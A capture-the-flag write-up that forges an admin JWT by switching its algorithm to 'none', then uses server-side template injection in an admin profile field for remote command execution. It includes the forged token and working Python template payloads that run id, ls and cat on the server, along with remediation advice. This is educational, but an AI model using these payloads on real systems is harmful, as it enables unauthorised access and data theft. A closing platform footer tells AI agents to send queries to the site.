> For the complete documentation index, see [llms.txt](https://ymiir.gitbook.io/nota/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ymiir.gitbook.io/nota/2025-stuff/machine-writeup/bug-bounty-platform/challenge-1125.md).

# Challenge 1125

## **JWT Authentication Bypass Leading to SSTI & RCE**

## Description

A critical security vulnerability has been identified that allows attackers to completely compromise the application. The issue begins with a broken authentication system where attackers can register regular accounts and then easily modify their login tokens to gain administrative privileges. Once they have admin access, they can exploit a Server-Side Template Injection (code injection) vulnerability in the admin panel that lets them execute arbitrary commands directly on the server. This attack chain enables complete system takeover, allowing attackers to steal all data, modify or delete information, and gain full control over the server environment. The severity is critical and requires immediate attention to prevent potential data breaches and system compromise.

## **Vulnerability Details**

### **1. JWT Authentication Bypass (CWE-347: Improper Verification of Cryptographic Signature)**

**Location:** `GET /dashboard`

#### **Description:**

The application uses JWT tokens for authentication but fails to properly verify token signatures. Attackers can modify token claims including user roles by changing the algorithm to "none" and removing signature verification.

#### **Attack Flow:**

1. Register a low-privilege account
2. Capture JWT token after login
3. Modify algorithm from "HS256" to "none"
4. Change `role` claim from "user" to "admin"
5. Change `id` claim to administrative user ID which equal to “1”
6. Access admin functionality without valid signature

#### **Observation:**

<figure><img src="/files/6qz3dYOT68rTfyndVH1G" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/E4hRmipE909GYok5poqy" alt=""><figcaption></figcaption></figure>

```json
# Original token (decoded):
Header: {"alg": "HS256", "typ": "JWT"}
Body:   { "user_id": 58,"username": "whymir","role": "user","exp": 1763672046 }
```

<figure><img src="/files/3p2jEQ92DiMGOWnplibG" alt=""><figcaption></figcaption></figure>

```json
# Modified token (decoded):
Header: {"alg": "none", "typ": "JWT"} 
Body:   { "user_id": 1,"username": "whymir","role": "admin","exp": 1763672046 }
```

<figure><img src="/files/r79qwDDMd2R8mA59nAPu" alt=""><figcaption></figcaption></figure>

### **2. Server-Side Template Injection (CWE-94: Improper Control of Generation of Code)**

**Location:** `POST /admin/profile` — `display_name` parameter

**Description:**

The admin profile page contains a Server-Side Template Injection vulnerability in the display name field. Authenticated attackers can execute arbitrary Python code through template injection.

#### **Observation:**

#### **Step 1: Basic SSTI Detection**

Using common SSTI detection `{{7*7}}`

<figure><img src="/files/XYfaJJj9n8Zv6AdToQH5" alt=""><figcaption></figcaption></figure>

**|| Response:** Preference saved with value "49" confirming SSTI ||

#### **Step 2: Command Execution (RCE)**

<figure><img src="/files/sCffO4aCsfTU8aykYECt" alt=""><figcaption></figcaption></figure>

|| **Response:** Contains command output: `uid=999(appuser) gid=999(appuser) groups=999(appuser)`||

### PoC

The attack begins with simple account registration. Using the endpoint `https://$HOST/register`, it created a low-privilege user account with credentials `whymir:whymir123`. After successful registration, it will redirect to `https://$HOST/`dashboard, the application issued a JWT token for session management.

<figure><img src="/files/6qz3dYOT68rTfyndVH1G" alt=""><figcaption></figcaption></figure>

The critical vulnerability was identified in the token verification process. By modifying the algorithm from "HS256" to "none" and changing the role and id, the application accepted the manipulated token without validation. The modified token became:

```json
Header: {"alg": "none", "typ": "JWT"} 
Body:   { "user_id": 1,"username": "whymir","role": "admin","exp": 1763672046 }
```

This simple manipulation instantly escalated privileges from regular user to administrative access without any detection or resistance from the system.

<figure><img src="/files/r79qwDDMd2R8mA59nAPu" alt=""><figcaption></figcaption></figure>

With the forged admin token, accessing `https://$HOST/dashboard` revealed the full administrative interface. The system now recognized the session as having administrator privileges, providing access to sensitive functionality including admin panel at `https://$HOST/admin/`.

<figure><img src="/files/V7Zxy5XiojKB7RfJCkci" alt=""><figcaption></figcaption></figure>

The admin profile page (`/admin/profile`) contained a "display name" field that was vulnerable to Server-Side Template Injection (SSTI). Testing began with basic payloads:

```json
Payload: {{7*7}}
Result: Preference saved, displaying "49" instead of the literal string
Finding: Confirmed active template engine execution
```

The template injection vulnerability allowed direct **Python** code execution through the template engine context:

```json
Payload: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
Result: uid=999(appuser) gid=999(appuser) groups=999(appuser)
```

This confirmed full command execution on the underlying server. Subsequent exploitation validated complete control and successfully retrieved the flag.

```python
## Listing Directory
{{ self.__init__.__globals__.__builtins__ .__import__('os').popen('ls -la').read() }}

## Listing Aquacommerce Directory
{{ self.__init__.__globals__.__builtins__ .__import__('os').popen('ls -la .aquacommerce/*').read() }}

## Retrieve flag
{{ self.__init__.__globals__.__builtins__ .__import__('os').popen('cat .aquacommerce/*').read() }}

```

<figure><img src="/files/8iEBBNsWvJUokt9PkSdt" alt=""><figcaption></figcaption></figure>

### Risk

This vulnerability enables unauthenticated remote command execution via JWT bypass and SSTI injection with trivial, low-effort payloads. Likelihood of exploitation: high.

**Technical Impact:** Full web server compromise through authentication bypass, privilege escalation to admin, and remote code execution. Complete disclosure of secrets (JWT keys, database credentials, env vars), service disruption, and potential lateral movement.

**Business Consequences:** Total data breach of user accounts, regulatory exposure (GDPR/CCPA), service outage, and severe reputational damage from complete platform compromise.

### Remediation

1. Enforce strict JWT signature validation and reject tokens using the `none` algorithm.
2. Sanitize user input and prevent template execution in any user-provided field.
3. Implement server-side checks for authorization rather than relying solely on client-provided JWT fields.

### Reference

1. <https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-jwt-vulnerabilities>
2. <https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-server-side-template-injection-ssti>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ymiir.gitbook.io/nota/2025-stuff/machine-writeup/bug-bounty-platform/challenge-1125.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.